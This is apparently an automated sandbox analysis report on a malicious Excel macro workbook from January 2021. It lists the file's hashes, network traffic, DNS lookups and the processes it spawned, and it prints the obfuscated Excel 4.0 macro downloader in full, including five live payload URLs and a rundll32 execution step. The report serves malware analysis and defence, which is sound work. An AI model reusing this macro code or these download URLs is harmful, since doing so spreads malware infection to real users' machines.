                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                    File name:Refusal-376547573-01212021.xlsm
                                                                                                                                                    File size:26170
                                                                                                                                                    MD5:b2a6b33f2ace5e06ce661609f7297382
                                                                                                                                                    SHA1:85260ad8b2fdd4d3c6b49c9f87851fd0a125e1dd
                                                                                                                                                    SHA256:cac44e08ba7544ff35a9863faea38680dbf7675ad2e23d7ffc82e11ae0b2da67
                                                                                                                                                    SHA512:bf896aa61226c28b17da0b60195efe412b77a8210202a7fd9549e3bab34a3860526bb1de17e17866e860051ce7bf8a82fb5d8ca5690c460c8cd57f0dea52c33f
                                                                                                                                                    SSDEEP:384:OMfowh92aGcoKKRR6xt7k5SV8m2ylTQ8aoVT0QNuzWKP8WZoms:OMflhQaGc7SsFk5S6f6TfW+u7DZRs
                                                                                                                                                    File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "Refusal-376547573-01212021.xlsm"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,,,,,,,,,,=B154(),"=FORMULA.FILL(Mols!U54&Mols!U55&Mols!U56&Mols!U57&Mols!U58&Mols!U59,BB53)","=FORMULA.FILL(Mols!AC56,HI18807)","=EXEC(""r""&Mols!AC60&"" ""&Mols!AC59&HG9961)",=B156(),=C156(),=HALT(),"=FORMULA.FILL(Mols!V53&Mols!V54&Mols!V55&Mols!V56&Mols!V57&Mols!V58&Mols!V59&Mols!V60&Mols!V61&Mols!V62&Mols!V63&Mols!V64&Mols!V65&Mols!V66&Mols!V67&Mols!V68&Mols!V69&Mols!V70,HZ48004)","=FORMULA.FILL(Mols!AC57,AN32726)",,=B158(),=C158(),"=REGISTER(BB53,HZ48004,HI18898,IK4106,,1,9)","=FORMULA.FILL(Mols!U62&Mols!U63&Mols!U64&Mols!U65&Mols!U66&Mols!U67,HI18898)","=FORMULA.FILL(""BCCJ"",IK16309)","=Niokaser(0,GT17028,AQ4875,0,0)",=B160(),=C160(),,"=FORMULA.FILL(Mols!AC58&B169,GT17028)","=FORMULA.FILL(""Niokaser"",IK4106)","=REGISTER(HI18807,AN32726,IK16309,DI7875,,1,9)",=B162(),=C162(),"=Vuolasd(GT17028,AQ4875,1)","=FORMULA.FILL(Mols!AC59,AQ4875)","=FORMULA.FILL(""Vuolasd"",DI7875)",,"=FORMULA.FILL(Mols!AC60,AS41071)",=A158(),=GOTO(D154),=B165(),,,"=FORMULA.FILL(Mols!AC61,HG9961)",,indianhealthtrust.com/yhnqj/5555555555.jpg,=C154(),,destock-optic.fr/cdmhgbfhfwq/5555555555.jpg,,,themagicalfortress.com/bwqbfbse/5555555555.jpg,,,www.toteteca.com/qzkiodlofm/5555555555.jpg,"=INDEX(D165:D169,RANDBETWEEN(1,5))",,christiecentre.com.au/exmpjzwsb/5555555555.jpg

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 21, 2021 20:21:24.418814898 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:21:24.614094019 CET8049726172.107.2.98192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:24.614284039 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:21:24.615680933 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:21:24.810883045 CET8049726172.107.2.98192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:24.833448887 CET8049726172.107.2.98192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:24.833570004 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:21:24.881741047 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:21:25.080446959 CET8049726172.107.2.98192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:25.080710888 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:21:30.085751057 CET8049726172.107.2.98192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:30.086019993 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:23:11.210792065 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:23:11.677812099 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:23:12.536982059 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:23:14.240231037 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:23:17.631149054 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:23:24.397514105 CET4972680192.168.2.3172.107.2.98
                                                                                                                                                    Jan 21, 2021 20:23:37.914190054 CET4972680192.168.2.3172.107.2.98

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 21, 2021 20:21:10.323122978 CET6010053192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:10.387645960 CET53601008.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:12.829710007 CET5319553192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:12.886261940 CET53531958.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:14.760706902 CET5014153192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:14.812318087 CET53501418.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:20.169378996 CET5302353192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:20.217303038 CET53530238.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:21.255944967 CET4956353192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:21.320152998 CET53495638.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:21.760895967 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:21.812664032 CET5934953192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:21.820683956 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:21.868736029 CET53593498.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:22.771094084 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:22.819041967 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:23.788671017 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:23.932265043 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:24.194164038 CET5708453192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:24.322345018 CET5882353192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:24.370199919 CET53588238.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:24.414689064 CET53570848.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:25.131225109 CET5756853192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:25.179048061 CET53575688.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:25.809680939 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:25.865835905 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:26.132219076 CET5054053192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:26.184506893 CET53505408.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:27.299460888 CET5436653192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:27.356527090 CET53543668.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:28.160058975 CET5303453192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:28.216711044 CET53530348.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:28.959836960 CET5776253192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:29.007872105 CET53577628.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:29.810051918 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:29.858069897 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:39.314122915 CET5543553192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:39.361934900 CET53554358.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:43.983699083 CET5071353192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:44.045573950 CET53507138.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:21:49.692667007 CET5613253192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:21:49.753544092 CET53561328.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:22:00.154864073 CET5898753192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:22:00.218626976 CET53589878.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:22:00.407541037 CET5657953192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:22:00.455528975 CET53565798.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:22:01.170169115 CET6063353192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:22:01.218050003 CET53606338.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:22:05.200642109 CET6129253192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:22:05.258390903 CET53612928.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:23:04.246331930 CET6361953192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:23:04.246705055 CET6493853192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:23:04.303802013 CET53636198.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:23:04.304248095 CET53649388.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:23:05.097207069 CET6194653192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:23:05.148049116 CET53619468.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:23:38.652728081 CET6491053192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:23:38.700684071 CET53649108.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:23:39.092720985 CET5212353192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:23:39.162045956 CET53521238.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:01.356036901 CET5613053192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:01.434169054 CET53561308.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:01.984343052 CET5633853192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:02.044547081 CET53563388.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:02.639909983 CET5942053192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:02.696418047 CET53594208.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:03.185229063 CET5878453192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:03.233536959 CET53587848.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:03.681096077 CET6397853192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:03.737831116 CET53639788.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:04.339524031 CET6293853192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:04.398838997 CET53629388.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:05.300633907 CET5570853192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:05.349708080 CET53557088.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:06.179513931 CET5680353192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:06.235971928 CET53568038.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:07.156276941 CET5714553192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:07.212718964 CET53571458.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:24:07.808208942 CET5535953192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:24:07.867727995 CET53553598.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:26:00.879404068 CET5830653192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:26:00.927557945 CET53583068.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:26:01.738293886 CET6412453192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:26:01.809052944 CET53641248.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:26:06.281502962 CET4936153192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:26:06.345416069 CET53493618.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:26:09.455948114 CET6315053192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:26:09.520410061 CET53631508.8.8.8192.168.2.3
                                                                                                                                                    Jan 21, 2021 20:26:09.887212992 CET5327953192.168.2.38.8.8.8
                                                                                                                                                    Jan 21, 2021 20:26:09.951756001 CET53532798.8.8.8192.168.2.3

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Jan 21, 2021 20:21:24.194164038 CET192.168.2.38.8.8.80x4589Standard query (0)www.toteteca.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 21, 2021 20:23:04.246331930 CET192.168.2.38.8.8.80x1a6eStandard query (0)cdn.onenote.netA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Jan 21, 2021 20:21:24.414689064 CET8.8.8.8192.168.2.30x4589No error (0)www.toteteca.comtoteteca.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Jan 21, 2021 20:21:24.414689064 CET8.8.8.8192.168.2.30x4589No error (0)toteteca.com172.107.2.98A (IP address)IN (0x0001)
                                                                                                                                                    Jan 21, 2021 20:23:04.303802013 CET8.8.8.8192.168.2.30x1a6eNo error (0)cdn.onenote.netcdn.onenote.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Jan 21, 2021 20:26:00.927557945 CET8.8.8.8192.168.2.30x6949No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • www.toteteca.com

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349726172.107.2.9880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 21, 2021 20:21:24.615680933 CET96OUTGET /qzkiodlofm/5555555555.jpg HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: www.toteteca.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Jan 21, 2021 20:21:24.833448887 CET103INHTTP/1.1 508 Loop Detected
                                                                                                                                                    Date: Thu, 21 Jan 2021 19:21:23 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Retry-After: 14400
                                                                                                                                                    Content-Length: 288
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 20 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 2f 48 31 3e 0a 54 68 65 20 77 65 62 73 69 74 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 61 73 20 69 74 20 65 78 63 65 65 64 65 64 20 72 65 73 6f 75 72 63 65 20 6c 69 6d 69 74 2e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE> 508 Resource Limit Is Reached</TITLE></HEAD><BODY><H1>Resource Limit Is Reached</H1>The website is temporarily unable to service your request as it exceeded resource limit.Please try again later.</BODY></HTML>
                                                                                                                                                    Jan 21, 2021 20:21:24.881741047 CET108OUTGET /qzkiodlofm/5555555555.jpg HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: www.toteteca.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Jan 21, 2021 20:21:25.080446959 CET109INHTTP/1.1 508 Loop Detected
                                                                                                                                                    Date: Thu, 21 Jan 2021 19:21:24 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Retry-After: 14400
                                                                                                                                                    Content-Length: 288
                                                                                                                                                    Keep-Alive: timeout=5, max=99
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 20 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 2f 48 31 3e 0a 54 68 65 20 77 65 62 73 69 74 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 61 73 20 69 74 20 65 78 63 65 65 64 65 64 20 72 65 73 6f 75 72 63 65 20 6c 69 6d 69 74 2e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE> 508 Resource Limit Is Reached</TITLE></HEAD><BODY><H1>Resource Limit Is Reached</H1>The website is temporarily unable to service your request as it exceeded resource limit.Please try again later.</BODY></HTML>


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:20:21:20
                                                                                                                                                    Start date:21/01/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:20:21:25
                                                                                                                                                    Start date:21/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
                                                                                                                                                    Imagebase:0x1080000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >